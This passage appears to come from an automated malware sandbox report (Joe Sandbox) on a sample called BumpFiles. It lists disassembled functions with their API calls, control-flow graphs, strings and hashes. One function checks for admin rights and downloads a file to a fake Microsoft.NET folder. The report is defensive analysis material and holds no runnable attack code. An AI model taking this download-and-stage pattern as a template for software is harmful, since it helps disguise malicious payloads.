                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD37
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD94
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CDBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-GB,en,en-US,
                                                                    • API String ID: 975949045-3021119265
                                                                    • Opcode ID: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction ID: 257e64961a288cd264a0ffaab5fede5390936cc15f122fe2aa70ea45eab53adf
                                                                    • Opcode Fuzzy Hash: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction Fuzzy Hash: C021A1207C0700ABD710B7BA8C8276E359A9F46705F50853FB400BA2D3CA7D8C4597AE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409778 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 161threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 134 409778-409785 135 409787 134->135 136 40978c-4097c0 GetCurrentThreadId 134->136 135->136 137 4097c2 136->137 138 4097c4-4097f0 call 40965c 136->138 137->138 141 4097f2-4097f4 138->141 142 4097f9-409800 138->142 141->142 143 4097f6 141->143 144 409802-409805 142->144 145 40980a-409810 142->145 143->142 144->145 146 409812 145->146 147 409815-40981c 145->147 146->147 148 40982b-40982f 147->148 149 40981e-409825 147->149 150 409ac4-409ade 148->150 151 409835 call 40970c 148->151 149->148 153 409ae0-409aec call 4099a4 call 409a2c 150->153 154 409af1-409af8 150->154 156 40983a 151->156 153->154 157 409afa-409b05 GetCurrentThreadId 154->157 158 409b1b-409b1f 154->158 157->158 160 409b07-409b16 call 40967c call 409a00 157->160 161 409b21-409b25 158->161 162 409b39-409b3d 158->162 160->158 161->162 167 409b27-409b37 161->167 163 409b49-409b4d 162->163 164 409b3f-409b42 162->164 169 409b6c-409b75 call 4096a4 163->169 170 409b4f-409b58 call 406f34 163->170 164->163 168 409b44-409b46 164->168 167->162 168->163 179 409b77-409b7a 169->179 180 409b7c-409b81 169->180 170->169 181 409b5a-409b6a call 407f28 call 406f34 170->181 179->180 182 409b9d-409ba8 call 40967c 179->182 180->182 183 409b83-409b91 call 40d92c 180->183 181->169 192 409baa 182->192 193 409bad-409bb1 182->193 183->182 191 409b93-409b95 183->191 191->182 195 409b97-409b98 FreeLibrary 191->195 192->193 196 409bb3-409bb5 call 409a00 193->196 197 409bba-409bbd 193->197 195->182 196->197 198 409bd6-409be7 197->198 199 409bbf-409bc6 197->199 198->162 201 409bc8 199->201 202 409bce-409bd1 ExitProcess 199->202 201->202
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004097AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID: 0Q@$8Q@$t5B
                                                                    • API String ID: 2882836952-4101180140
                                                                    • Opcode ID: bd1549fbf8f57001a698ec59130599b92d530f04859152d71de3bc48d7d6092a
                                                                    • Instruction ID: fa2ecaef7f14139ccfdb006b918d688549a946047fb110133aaf8be8ca82c4d5
                                                                    • Opcode Fuzzy Hash: bd1549fbf8f57001a698ec59130599b92d530f04859152d71de3bc48d7d6092a
                                                                    • Instruction Fuzzy Hash: 8D517B74A002058BDB24EF29D88475A7BE1BB49324F14857EE845AB3D3D778EC85CB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00633404 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 65windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • IsUserAnAdmin.SHELL32 ref: 00633424
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006334A4
                                                                      • Part of subcall function 00424F1C: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
                                                                      • Part of subcall function 004258EC: CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                      • Part of subcall function 00633A38: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    • C:\Program Files (x86)\Microsoft.NET\base, xrefs: 00633441, 0063344F
                                                                    • C:\Program Files (x86)\Microsoft.NET\fuge.zip, xrefs: 00633474
                                                                    • FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB, xrefs: 00633467
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
                                                                    • String ID: C:\Program Files (x86)\Microsoft.NET\base$C:\Program Files (x86)\Microsoft.NET\fuge.zip$FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB
                                                                    • API String ID: 3215071381-4060426360
                                                                    • Opcode ID: f6837130be4614ce25fd961279331029222d47893cd0f967968c80173aceed89
                                                                    • Instruction ID: 8dad2de6a8b3dea3eefc5337c2ac44f97f3349aa0d5aad20445da69dd7c69d86
                                                                    • Opcode Fuzzy Hash: f6837130be4614ce25fd961279331029222d47893cd0f967968c80173aceed89
                                                                    • Instruction Fuzzy Hash: 9811B670600714AFD711FF61DD52ADE73EADB48304F90446AF401A7393DA39AF0187A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EDEA4 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 227 5edea4-5edebf PeekMessageW 228 5edfad-5edfb4 227->228 229 5edec5-5edec9 227->229 230 5edecb-5eded3 IsWindowUnicode 229->230 231 5eded9 229->231 230->231 233 5eded5-5eded7 230->233 232 5ededb-5edee4 231->232 234 5edefc-5edf0f PeekMessageA 232->234 235 5edee6-5edefa PeekMessageW 232->235 233->232 236 5edf10-5edf12 234->236 235->236 236->228 237 5edf18-5edf1e 236->237 238 5edfa6 237->238 239 5edf24-5edf30 237->239 238->228 240 5edf42-5edf4d call 5efd40 239->240 241 5edf32-5edf36 239->241 240->228 244 5edf4f-5edf5a call 5edd38 240->244 241->240 244->228 247 5edf5c-5edf60 244->247 247->228 248 5edf62-5edf6d call 5edbf0 247->248 248->228 251 5edf6f-5edf7a call 5edc40 248->251 251->228 254 5edf7c-5edf87 call 5edba8 251->254 254->228 257 5edf89-5edf94 TranslateMessage 254->257 258 5edf9e-5edfa4 DispatchMessageA 257->258 259 5edf96-5edf9c DispatchMessageW 257->259 258->228 259->228
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005EDEB8
                                                                    • IsWindowUnicode.USER32 ref: 005EDECC
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDEEF
                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005EDF05
                                                                    • TranslateMessage.USER32 ref: 005EDF8A
                                                                    • DispatchMessageW.USER32 ref: 005EDF97
                                                                    • DispatchMessageA.USER32 ref: 005EDF9F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                    • String ID:
                                                                    • API String ID: 2190272339-0
                                                                    • Opcode ID: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
                                                                    • Instruction ID: 1e2ffcf5faaac0e623271d00fe91a0f5e8c3699351e3eb57bdfabddf9ae2a005
                                                                    • Opcode Fuzzy Hash: 3098b82d3c33b3f691702e6728c507f08bf160ba0ef26f0c27fb9a5b6649148f
                                                                    • Instruction Fuzzy Hash: 86210A30B547C065EA39B52B0C06BFEAFB96FD6704F14451DF4E29B2C2DA9D9C424236
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EE0E8 Relevance: 3.1, APIs: 2, Instructions: 104COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 299 5ee0e8-5ee100 300 5ee102-5ee111 call 408334 299->300 301 5ee113-5ee115 299->301 300->301 305 5ee117 300->305 302 5ee119-5ee18d 301->302 309 5ee18f-5ee19f call 408214 302->309 310 5ee203-5ee217 302->310 305->302 309->310 317 5ee1a1-5ee1bb call 53efc8 309->317 311 5ee219-5ee229 call 408214 310->311 312 5ee235 310->312 311->312 318 5ee22b-5ee22e 311->318 321 5ee1bd-5ee1e0 GetWindowLongW SetWindowLongW 317->321 322 5ee1e5-5ee1fe call 5e0e94 317->322 318->312 321->322 322->310
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005EE1C9
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005EE1E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
                                                                    • Instruction ID: 49b3cee1a357ac9e4b63db1826b3323ea065a8a199be338292a45e01145cc57d
                                                                    • Opcode Fuzzy Hash: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
                                                                    • Instruction Fuzzy Hash: AA418234A04684EFDB18CF69C886A9DBBF6FB49300F6185E5E850A7391C7349E41DB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D5E8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 324 40d5e8-40d62a call 409e78 * 2 call 409d94 331 40d630-40d640 call 40a1bc 324->331 332 40d6e4-40d6fe call 409df4 324->332 337 40d642-40d645 331->337 338 40d647-40d64c 331->338 337->338 340 40d673-40d682 call 40d324 338->340 341 40d64e-40d657 338->341 348 40d693-40d6b0 GetUserDefaultUILanguage call 40ccd4 call 40d450 340->348 349 40d684-40d691 call 40d450 340->349 342 40d659-40d66c call 40ac80 341->342 343 40d66e-40d671 341->343 342->340 343->340 343->341 356 40d6b2-40d6b9 348->356 357 40d6d5-40d6d8 348->357 349->332 356->357 358 40d6bb-40d6d0 GetSystemDefaultUILanguage call 40ccd4 call 40d450 356->358 357->332 359 40d6da-40d6df call 40d51c 357->359 358->357 359->332
                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D693
                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D786,00000000,?,00000105), ref: 0040D6BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: DefaultLanguage$SystemUser
                                                                    • String ID:
                                                                    • API String ID: 384301227-0
                                                                    • Opcode ID: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
                                                                    • Instruction ID: dba43ac39d730306daca4e1ada09fe9982239cc22dcd487a1f983162ddf5979f
                                                                    • Opcode Fuzzy Hash: 8a2bd1881834e6a44c33d5fad18fbb006ed95a30fdac29b3a3123759fe5b540d
                                                                    • Instruction Fuzzy Hash: 4231FE34E042099BDB10EBE5C881BAEB7B5AB48308F50487BE414B73D1DB79AD49CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D70C Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName
                                                                    • String ID:
                                                                    • API String ID: 1159719554-0
                                                                    • Opcode ID: 2b18c3781ee66c6b53a5173a8fe35087fbd537bb29e21f2de5c79d474cbb7333
                                                                    • Instruction ID: 8aa48a9f0ad89ad4cad376e89223919de5cbdd47df10d573a1ffb6370790ae73
                                                                    • Opcode Fuzzy Hash: 2b18c3781ee66c6b53a5173a8fe35087fbd537bb29e21f2de5c79d474cbb7333
                                                                    • Instruction Fuzzy Hash: D8114270A4021CAFDB14EB64CC86BDE73B8DB44704F5144BAB508B72D1DA785E858A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407CFB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,00407D6A,?,?,?,00000000), ref: 00407D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CompareString
                                                                    • String ID:
                                                                    • API String ID: 1825529933-0
                                                                    • Opcode ID: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
                                                                    • Instruction ID: 875274e2c4264f451e6ad1d12119ad3db8eed83e6ea6ef1fa48c92378bfb3a92
                                                                    • Opcode Fuzzy Hash: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
                                                                    • Instruction Fuzzy Hash: E5F0AF756486447EDB11F779CC82E5E73ACDF88704B2104BAF400F2292E6BD5E04962A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C498 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 428 40c498-40c4a6 429 40c4d3-40c4de 428->429 430 40c4a8-40c4bf GetModuleFileNameW call 40d70c 428->430 432 40c4c4-40c4cb 430->432 432->429 433 40c4cd-40c4d0 432->433 433->429
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040C4B6
                                                                      • Part of subcall function 0040D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
                                                                      • Part of subcall function 0040D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                    • Instruction ID: 3a4ae58969193307bce1041edd5d9d761091ef52682c61390113b32e0b793339
                                                                    • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                    • Instruction Fuzzy Hash: 92E0ED71A00310DBCB10DFA8D8C5A5737E4AB08754F0446A6ED14DF386D375DD1487D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F134 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                    • Instruction ID: c9d0dbab03ec1449dfd6cadc3055f85912d320d9fe12348b59d5370955ded952
                                                                    • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                    • Instruction Fuzzy Hash: 3DA012244089001AC404A7197C4340F31805D41114FC40B68745CB52C2E619C5640BDB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040564C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
